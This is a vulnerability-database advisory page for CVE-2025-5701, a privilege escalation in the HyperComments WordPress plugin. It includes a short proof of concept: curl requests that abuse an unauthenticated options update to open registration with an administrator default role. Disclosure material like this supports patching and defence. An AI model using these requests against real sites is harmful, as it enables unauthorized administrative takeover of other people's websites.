Lucene search
K

📄 WordPress HyperComments 1.2.2 Privilege Escalation

🗓️ 12 Jun 2025 00:00:00Reported by RandomRobbieBFType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 149 Views

Unauthenticated change of options via missing checks in hc_request_handler up to 1.2.2 enables admin access.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2025-5701
12 Jun 202508:27
githubexploit
GithubExploit
Exploit for CVE-2025-5701
11 Feb 202607:57
githubexploit
GithubExploit
Exploit for CVE-2025-5701
5 Jun 202515:27
githubexploit
Circl
CVE-2025-5701
5 Jun 202511:45
circl
CNNVD
WordPress plugin HyperComments 安全漏洞
5 Jun 202500:00
cnnvd
CVE
CVE-2025-5701
5 Jun 202511:15
cve
Cvelist
CVE-2025-5701 HyperComments <= 1.2.2 - Unauthenticated (Subscriber+) Arbitrary Options Update
5 Jun 202511:15
cvelist
EUVD
EUVD-2025-16984
3 Oct 202520:07
euvd
Nuclei
HyperComments <= 1.2.2 - Arbitrary Options Update
3 Jun 202606:04
nuclei
NVD
CVE-2025-5701
5 Jun 202512:15
nvd
Rows per page
# CVE-2025-5701
    HyperComments <= 1.2.2 - Unauthenticated (Subscriber+) Arbitrary Options Update
    
    # Description
    
    The HyperComments plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the hc_request_handler function in all versions up to, and including, 1.2.2. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.
    
    ## Details
    
    - **Type**: plugin
    - **Slug**: hypercomments
    - **Affected Version**: 1.2.2
    - **CVSS Score**: 9.8
    - **CVSS Rating**: Critical
    - **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    - **CVE**: CVE-2025-5701
    - **Status**: Closed
    
    POC
    ---
    
    ```
    curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
      -d "data={\"users_can_register\":\"1\",\"default_role\":\"administrator\"}" \
      -H "Content-Type: application/x-www-form-urlencoded"
    ```
    
    
    ```
    curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
      -d "data={\"users_can_register\":\"1\",\"users_can_register\":\"1\"}" \
      -H "Content-Type: application/x-www-form-urlencoded"
    ```

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Jun 2025 00:00Current
7.8High risk
Vulners AI Score7.8
CVSS 3.19.8
EPSS0.13438
SSVC
149